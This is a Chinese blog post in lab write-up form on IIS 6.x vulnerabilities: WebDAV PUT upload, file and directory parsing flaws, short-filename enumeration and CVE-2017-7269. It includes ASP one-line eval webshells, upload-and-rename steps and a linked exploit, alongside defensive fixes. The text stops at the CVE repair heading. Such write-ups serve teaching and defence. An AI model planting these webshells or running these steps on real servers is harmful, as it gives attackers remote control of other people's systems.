<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="https://gitee.com/BothSavage/PicGo/raw/master/image/favicon-16x16.png?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="https://gitee.com/BothSavage/PicGo/raw/master/image/favicon-32x32.png?v=2.6.2" type="image/png" sizes="32x32"><meta name="description" content="IIS">
<meta property="og:type" content="article">
<meta property="og:title" content="IIS总结">
<meta property="og:url" content="http://example.com/2021/04/28/IIS/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="IIS">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419203534647.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419203550907.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419203625404.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2021041920394431.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419204156932.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419205319689.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419205443191.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419204344870.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419204505486.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2021041920491958.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419211149191.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419214747665.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419214819595.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419220138851.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419220759356.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419220845103.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419220909777.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419222035267.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419222246923.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419222346964.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419222438344.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419222719562.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419222035267.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419223437566.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419223815843.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419223749142.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419223800836.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419224412315.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419224429122.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419225717659.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419225739769.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419225638291.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210419225657973.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/202104210658587.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420171101419.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420171424702.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420171811661.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420171930491.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420172013848.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420172206900.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420173003592.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420173126959.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420173240954.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210421071306721.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420173539422.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420173855222.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420173933357.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420174111203.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420174824230.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420175817649.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2021042017575348.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420175859782.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210421081103207.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2021042019273069.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420193035852.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420200103496.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420212942627.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420213012789.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420213052813.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420213347434.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420220352284.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420220412341.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420215553168.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420215800622.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420220147508.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420220309776.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420220615700.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/202104202208348.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2021042022090097.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420221109849.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420221125115.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420221249468.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420222250761.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420223553997.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420223003226.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420223026843.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420223135450.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420223156123.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420223213733.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2021042022323518.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420223726957.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420223923728.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2021042022393652.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420225200570.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420225313347.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420225344643.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420225420587.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210420225511491.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210421062847634.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210421063401203.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210421063455662.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210421063526720.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210421063602892.png">
<meta property="article:published_time" content="2021-04-28T09:20:11.723Z">
<meta property="article:modified_time" content="2021-06-22T10:31:50.952Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="IIS总结">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20210419203534647.png"><title>IIS总结 | Hexo</title><link ref="canonical" href="http://example.com/2021/04/28/IIS/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"复制","copySuccess":"复制成功","copyError":"复制失败"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 5.4.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">首页</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">归档</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">分类</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">标签</span></a></div></div><div class="header-nav-search"><span class="header-nav-search__icon"><i class="fas fa-search"></i></span><span class="header-nav-search__text">搜索</span></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Hexo</div><div class="header-banner-info__subtitle"></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">IIS总结</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">发表于</span><span class="post-meta-item__value">2021-04-28</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">更新于</span><span class="post-meta-item__value">2021-06-22</span></span></div></header><div class="post-body"><p><strong>IIS</strong></p>
<span id="more"></span>




        <h1 id="安装IIS6"   >
          <a href="#安装IIS6" class="heading-link"><i class="fas fa-link"></i></a><a href="#安装IIS6" class="headerlink" title="安装IIS6"></a>安装IIS6</h1>
      <p>这边在Windows Server 2003上安装</p>
<p><img src="https://img-blog.csdnimg.cn/20210419203534647.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210419203550907.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210419203625404.png" alt="在这里插入图片描述"></p>
<p>IIS 6.X 安装是需要插件的</p>
<p>安装完成了</p>
<p><img src="https://img-blog.csdnimg.cn/2021041920394431.png" alt="在这里插入图片描述"></p>
<p>打开就是这样</p>
<p><img src="https://img-blog.csdnimg.cn/20210419204156932.png" alt="在这里插入图片描述"></p>

        <h1 id="安装IIS7"   >
          <a href="#安装IIS7" class="heading-link"><i class="fas fa-link"></i></a><a href="#安装IIS7" class="headerlink" title="安装IIS7"></a>安装IIS7</h1>
      <p>IIS7-win7-x64</p>
<p><img src="https://img-blog.csdnimg.cn/20210419205319689.png" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20210419205443191.png" alt="在这里插入图片描述"></p>

        <h1 id="IIS-6-X渗透"   >
          <a href="#IIS-6-X渗透" class="heading-link"><i class="fas fa-link"></i></a><a href="#IIS-6-X渗透" class="headerlink" title="IIS 6.X渗透"></a>IIS 6.X渗透</h1>
      
        <h2 id="0x01-IIS写权限漏洞"   >
          <a href="#0x01-IIS写权限漏洞" class="heading-link"><i class="fas fa-link"></i></a><a href="#0x01-IIS写权限漏洞" class="headerlink" title="0x01 IIS写权限漏洞"></a>0x01 IIS写权限漏洞</h2>
      
        <h4 id="实操"   >
          <a href="#实操" class="heading-link"><i class="fas fa-link"></i></a><a href="#实操" class="headerlink" title="实操"></a>实操</h4>
      <p>开启WebDAV引起的IIS写权限漏洞（攻击者可以上传文件）</p>
<p>PUT任意上传漏洞！</p>
<p><img src="https://img-blog.csdnimg.cn/20210419204344870.png" alt="在这里插入图片描述"></p>
<p>开启脚本资源访问和写入：</p>
<p><img src="https://img-blog.csdnimg.cn/20210419204505486.png" alt="在这里插入图片描述"></p>
<p>尝试写一个html文件</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;center&gt;&lt;h1&gt;this is ASP a001 hello&lt;/center&gt;&lt;h1&gt;&lt;%eval request(&quot;a001&quot;)%&gt;</span><br></pre></td></tr></table></div></figure>

<p>IIS7远程访问一下</p>
<p><img src="https://img-blog.csdnimg.cn/2021041920491958.png" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20210419211149191.png" alt="在这里插入图片描述"></p>
<p>这边用一个工具</p>
<p><img src="https://img-blog.csdnimg.cn/20210419214747665.png" alt="在这里插入图片描述"></p>
<p>添加对端IP和端口</p>
<p><img src="https://img-blog.csdnimg.cn/20210419214819595.png" alt="在这里插入图片描述"></p>
<p>看到是可以写入的</p>
<p>打开Windows Server 2003上默认网站对用户的权限</p>
<p><img src="https://img-blog.csdnimg.cn/20210419220138851.png" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20210419220759356.png" alt="在这里插入图片描述"></p>
<p>写入一句话木马</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;%<span class="function">eval <span class="title">request</span><span class="params">(<span class="string">&quot;a&quot;</span>)</span>%&gt;</span></span><br></pre></td></tr></table></div></figure>

<p>利用一个的<code>.exe</code>文件  进行PUT上传</p>
<p><img src="https://img-blog.csdnimg.cn/20210419220845103.png" alt="在这里插入图片描述"></p>
<p>可以看到成功了</p>
<p>去Windows Server 2003上看一下 刷新一下</p>
<p><img src="https://img-blog.csdnimg.cn/20210419220909777.png" alt="在这里插入图片描述"></p>
<p>可以看到上传成功了</p>
<p>这里说明一下</p>
<p>成功通过PUT方法上传了一个含有<code>asp</code>的一句话木马的txt文件</p>
<p>之所以不直接上传一个asp一句话是因为通常上传txt文本不会出错，但是上传asp就会报错</p>
<p>这个时候经过修改一下就可以了</p>
<p>这里要去Windows Server 2003开启IIS的asp解析功能</p>
<p><img src="https://img-blog.csdnimg.cn/20210419222035267.png" alt="在这里插入图片描述"></p>
<p>然后把刚才上传上去的1.txt文件改名为shell.asp</p>
<p><img src="https://img-blog.csdnimg.cn/20210419222246923.png" alt="在这里插入图片描述"></p>
<p>然后访问，拿蚁剑连接就可以了</p>
<p><img src="https://img-blog.csdnimg.cn/20210419222346964.png" alt="-"></p>
<p><img src="https://img-blog.csdnimg.cn/20210419222438344.png" alt="在这里插入图片描述"></p>

        <h4 id="防御"   >
          <a href="#防御" class="heading-link"><i class="fas fa-link"></i></a><a href="#防御" class="headerlink" title="防御"></a>防御</h4>
      <p>1.关闭 WebDav<br>2.关闭写入权限</p>

        <h2 id="0x02-解析漏洞"   >
          <a href="#0x02-解析漏洞" class="heading-link"><i class="fas fa-link"></i></a><a href="#0x02-解析漏洞" class="headerlink" title="0x02 解析漏洞"></a>0x02 解析漏洞</h2>
      
        <h3 id="IIS文件解析漏洞"   >
          <a href="#IIS文件解析漏洞" class="heading-link"><i class="fas fa-link"></i></a><a href="#IIS文件解析漏洞" class="headerlink" title="IIS文件解析漏洞"></a>IIS文件解析漏洞</h3>
      
        <h4 id="原理"   >
          <a href="#原理" class="heading-link"><i class="fas fa-link"></i></a><a href="#原理" class="headerlink" title="原理"></a>原理</h4>
      <p>IIS文件解析漏洞：<code>*.asp;.xxx</code>像这样畸形的文件IIS只会把他当作xxx.asp文件执行不会看分号之后的内容。</p>

        <h4 id="实操-1"   >
          <a href="#实操-1" class="heading-link"><i class="fas fa-link"></i></a><a href="#实操-1" class="headerlink" title="实操"></a>实操</h4>
      <p>IIS文件解析漏洞</p>
<p>首先在Windows Server 2003上创建一个a001.asp</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;%=time()%&gt;  会显示当前的时间</span><br></pre></td></tr></table></div></figure>

<p><img src="https://img-blog.csdnimg.cn/20210419222719562.png" alt="在这里插入图片描述"></p>
<p>同样也是要开启IIS的asp解析功能</p>
<p><img src="https://img-blog.csdnimg.cn/20210419222035267.png" alt="在这里插入图片描述"></p>
<p>远程访问一下</p>
<p><img src="https://img-blog.csdnimg.cn/20210419223437566.png" alt="在这里插入图片描述"></p>
<p>然后开始分析</p>
<p><code>a001.asp;.jpg</code>–&gt;实际访问的是<code>a001.asp</code></p>
<p><code>a001.asp;.zip</code>–&gt;实际访问的是<code>a001.zip</code></p>
<p><img src="https://img-blog.csdnimg.cn/20210419223815843.png" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20210419223749142.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210419223800836.png" alt="在这里插入图片描述"></p>
<p>这个时候 当我们将这个内容改成asp的一句话木马时</p>
<p>访问一下</p>
<p><img src="https://img-blog.csdnimg.cn/20210419224412315.png" alt="在这里插入图片描述"></p>
<p>拿蚁剑连接一下 是可以的</p>
<p><img src="https://img-blog.csdnimg.cn/20210419224429122.png" alt="在这里插入图片描述"></p>

        <h3 id="IIS目录解析漏洞"   >
          <a href="#IIS目录解析漏洞" class="heading-link"><i class="fas fa-link"></i></a><a href="#IIS目录解析漏洞" class="headerlink" title="IIS目录解析漏洞"></a>IIS目录解析漏洞</h3>
      
        <h4 id="原理-1"   >
          <a href="#原理-1" class="heading-link"><i class="fas fa-link"></i></a><a href="#原理-1" class="headerlink" title="原理"></a>原理</h4>
      <p>IIS目录解析漏洞：以<code>*.asp</code>命名的文件夹中的文件都会被当作asp文件执行</p>
<p>创建一个1.asp目录</p>
<p><img src="https://img-blog.csdnimg.cn/20210419225717659.png" alt="在这里插入图片描述"></p>
<p>把之前的1.txt复制进来</p>
<p><img src="https://img-blog.csdnimg.cn/20210419225739769.png" alt="在这里插入图片描述"></p>
<p>访问一下</p>
<p><img src="https://img-blog.csdnimg.cn/20210419225638291.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210419225657973.png" alt="在这里插入图片描述"></p>

        <h4 id="防御-1"   >
          <a href="#防御-1" class="heading-link"><i class="fas fa-link"></i></a><a href="#防御-1" class="headerlink" title="防御"></a>防御</h4>
      <ul>
<li><p>设置权限无<br><img src="https://img-blog.csdnimg.cn/202104210658587.png" alt="在这里插入图片描述"></p>
</li>
<li><p>不允许新建目录。</p>
</li>
<li><p>上传的文件需经过重命名（时问戳+随机数+jpg等）</p>
</li>
</ul>

        <h2 id="0x03-IIS短文件漏洞"   >
          <a href="#0x03-IIS短文件漏洞" class="heading-link"><i class="fas fa-link"></i></a><a href="#0x03-IIS短文件漏洞" class="headerlink" title="0x03 IIS短文件漏洞"></a>0x03 IIS短文件漏洞</h2>
      
        <h3 id="简介"   >
          <a href="#简介" class="heading-link"><i class="fas fa-link"></i></a><a href="#简介" class="headerlink" title="简介"></a>简介</h3>
      <p>攻击者可以利用<code>~</code>字符猜解或遍历服务器中的文件名，或对IIS服务器中的 Net framework进行拒绝服务攻击！</p>
<p>就是存在文件枚举漏洞，攻击者可利用此漏洞枚举网络服务器根目录中的文件</p>
<p>我们到IIS目录下 去看一下</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dir /x</span><br></pre></td></tr></table></div></figure>

<p><img src="https://img-blog.csdnimg.cn/20210420171101419.png" alt="在这里插入图片描述"></p>

        <h3 id="IIS短文件名产生"   >
          <a href="#IIS短文件名产生" class="heading-link"><i class="fas fa-link"></i></a><a href="#IIS短文件名产生" class="headerlink" title="IIS短文件名产生"></a>IIS短文件名产生</h3>
      <ul>
<li>当后缀小于4时，短文件名产生需要文件（夹）名前缀字符长度大于等于9位</li>
<li>当后缀大于等于4时，文件名前缀字符长度即使为1，也会产生短文件名</li>
</ul>
<p>目前IIS支持短文件名猜测的HTTP方法主要包括：DEBUG、OPTIONS、GET、POST、HEAD、TRACE六种</p>
<p>IIS8.0之后的版本只能通过 OPTIONS和 TRACE方法被猜测成功</p>

        <h3 id="实操-2"   >
          <a href="#实操-2" class="heading-link"><i class="fas fa-link"></i></a><a href="#实操-2" class="headerlink" title="实操"></a>实操</h3>
      <p>IIS8.0以下版本需要开启 ASP.NET支持，IIS大于等于8.0版本，即使没有安装 ASP.NET，通过OPTIONS和 TRACE方法也可以猜解成功</p>
<p>需要安装一下ASP.NET</p>
<p><img src="https://img-blog.csdnimg.cn/20210420171424702.png" alt="在这里插入图片描述"></p>
<p>然后就多了这么一个东西</p>
<p><img src="https://img-blog.csdnimg.cn/20210420171811661.png" alt="在这里插入图片描述"><br>新建一个<code>.aspx</code>的文件</p>
<p><img src="https://img-blog.csdnimg.cn/20210420171930491.png" alt="在这里插入图片描述"></p>
<p>可以看到它也是存在的</p>
<p><img src="https://img-blog.csdnimg.cn/20210420172013848.png" alt="在这里插入图片描述"></p>
<p>正常情况下 我们远程访问一下 </p>
<p>它的返回是404</p>
<p><img src="https://img-blog.csdnimg.cn/20210420172206900.png" alt="在这里插入图片描述"></p>
<p>或者是400的错误</p>
<p>用一个工具去爆破它</p>
<p>具体看这里</p>
<p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://github.com/WebBreacher/tilde_enum" >https://github.com/WebBreacher/tilde_enum</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span><br><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://github.com/irsdl/IIS-ShortName-Scanner" >https://github.com/irsdl/IIS-ShortName-Scanner</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>安装java7</p>
<p>启动就是这样</p>
<p><img src="https://img-blog.csdnimg.cn/20210420173003592.png" alt="在这里插入图片描述"><br>需要输入对端的IP</p>
<p><img src="https://img-blog.csdnimg.cn/20210420173126959.png" alt="在这里插入图片描述"></p>
<p>这里选no</p>
<p>然后一路回车就好了</p>
<p>它就爆破出来了</p>
<p><img src="https://img-blog.csdnimg.cn/20210420173240954.png" alt="在这里插入图片描述"></p>

        <h3 id="修复建议"   >
          <a href="#修复建议" class="heading-link"><i class="fas fa-link"></i></a><a href="#修复建议" class="headerlink" title="修复建议"></a>修复建议</h3>
      
        <h4 id="1-从CMD命令关闭NTFS8-3文件格式的支持"   >
          <a href="#1-从CMD命令关闭NTFS8-3文件格式的支持" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-从CMD命令关闭NTFS8-3文件格式的支持" class="headerlink" title="1.从CMD命令关闭NTFS8.3文件格式的支持"></a>1.从CMD命令关闭NTFS8.3文件格式的支持</h4>
      <figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Windows server2003：（<span class="number">1</span>代表关闭，<span class="number">0</span>代表开启</span><br><span class="line">关闭该功能</span><br><span class="line"></span><br><span class="line">fsutil behavior <span class="built_in">set</span> disable8dot3 <span class="number">1</span></span><br></pre></td></tr></table></div></figure>

<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Windows server <span class="number">2008</span> R2：</span><br><span class="line">查询是否开启短文件名功能：fsutil <span class="number">8</span>dot3name query</span><br><span class="line"></span><br><span class="line">关闭该功能：fsutil <span class="number">8</span>dot3name <span class="built_in">set</span> <span class="number">1</span></span><br><span class="line"></span><br><span class="line">不同系统关闭命令稍有区别，该功能默认是开启的</span><br></pre></td></tr></table></div></figure>


        <h4 id="2-从修改注册表关闭NTFS-8-3文件格式的支持"   >
          <a href="#2-从修改注册表关闭NTFS-8-3文件格式的支持" class="heading-link"><i class="fas fa-link"></i></a><a href="#2-从修改注册表关闭NTFS-8-3文件格式的支持" class="headerlink" title="2.从修改注册表关闭NTFS 8.3文件格式的支持"></a>2.从修改注册表关闭NTFS 8.3文件格式的支持</h4>
      <p>快捷键Win+R打开命令窗口，输入 regedit打开注册表窗口</p>
<p>找到路径</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem</span><br></pre></td></tr></table></div></figure>
<p><img src="https://img-blog.csdnimg.cn/20210421071306721.png" alt="在这里插入图片描述"><br>将其中的 NtfsDisable8dot3NameCreation这一项的值设为1，1代表不创建短文件名格式</p>

        <h4 id="注意"   >
          <a href="#注意" class="heading-link"><i class="fas fa-link"></i></a><a href="#注意" class="headerlink" title="注意"></a>注意</h4>
      <p>以上两种方式修改完成后，均需要重启系统生效。<br><strong>此方法只能禁止NTFS 8.3格式文件名创建，已经存在的文件的短文件名无法移除，需要重新复制才会消失</strong></p>

        <h3 id="实战用处"   >
          <a href="#实战用处" class="heading-link"><i class="fas fa-link"></i></a><a href="#实战用处" class="headerlink" title="实战用处"></a>实战用处</h3>
      <ul>
<li>猜后台。</li>
<li>猜敏感文件，例如备份的<code>rar</code>、<code>zip</code>、<code>.bαk</code>、<code>.SQL</code>文件等。</li>
<li>在某些情形下，甚至可以通过短文件名直接下载对应的文件。比如下载备份SQL文件。</li>
</ul>

        <h3 id="IIS短文件漏洞局限性"   >
          <a href="#IIS短文件漏洞局限性" class="heading-link"><i class="fas fa-link"></i></a><a href="#IIS短文件漏洞局限性" class="headerlink" title="IIS短文件漏洞局限性"></a>IIS短文件漏洞局限性</h3>
      <ul>
<li>如果文件名本身太短也是无法猜解的</li>
<li>此漏洞只能确定前6个字符，如果后面的字符太长、包含特殊字符，很难猜解</li>
<li>如果文件名前6位带空格，8.3格式的短文件名会补进，和真实文件名不匹配</li>
<li>如果文件夹名前6位字符带点<code>.</code>，扫描程序会认为是文件而不是文件夹，最终出现误报</li>
<li>不支持中文文件名，包括中文文件和中文文件夹。一个中文相当于两个英文字符，故超过4个中文字会产生短文件名，但是IIS不支持中文猜测</li>
</ul>

        <h2 id="0x04-RCE-CVE-2017-7269"   >
          <a href="#0x04-RCE-CVE-2017-7269" class="heading-link"><i class="fas fa-link"></i></a><a href="#0x04-RCE-CVE-2017-7269" class="headerlink" title="0x04 RCE-CVE-2017-7269"></a>0x04 RCE-CVE-2017-7269</h2>
      
        <h3 id="简介-1"   >
          <a href="#简介-1" class="heading-link"><i class="fas fa-link"></i></a><a href="#简介-1" class="headerlink" title="简介"></a>简介</h3>
      <p>Microsoft windows Server 2003 R2中的 Interne信息服务IIS6.0中的 WebDAV服务中的ScStoragePathFromUrl函数中的缓冲区溢出允许远程攻击者通过以<code>If:&lt;http://</code>开头的长标头执行任意代码 PROPFIND请求</p>

        <h3 id="影响范围："   >
          <a href="#影响范围：" class="heading-link"><i class="fas fa-link"></i></a><a href="#影响范围：" class="headerlink" title="影响范围："></a>影响范围：</h3>
      <p>WiNdows Server 2003 R2上使用IIS6.0并开启 WebDAV扩展。</p>
<p>复现一下这个漏洞</p>
<p>根据需求进行设置</p>
<p><img src="https://img-blog.csdnimg.cn/20210420173539422.png" alt="在这里插入图片描述"></p>
<p>然后在Win7 远程打一下Windows Server 2003</p>
<p>Exp地址</p>
<p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py" >https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>Exp是基于python2的</p>
<p>修改一下</p>
<p>对端IP和端口</p>
<p><img src="https://img-blog.csdnimg.cn/20210420173855222.png" alt="在这里插入图片描述"></p>
<p>执行一下</p>
<p><img src="https://img-blog.csdnimg.cn/20210420173933357.png" alt="在这里插入图片描述"></p>
<p>去看看Win7的进程</p>
<p>多了<code>calc.exe</code>这样一个进程</p>
<p><img src="https://img-blog.csdnimg.cn/20210420174111203.png" alt="在这里插入图片描述"></p>
<p>证明是存在缓冲区溢出的</p>

        <h3 id="漏洞修复"   >
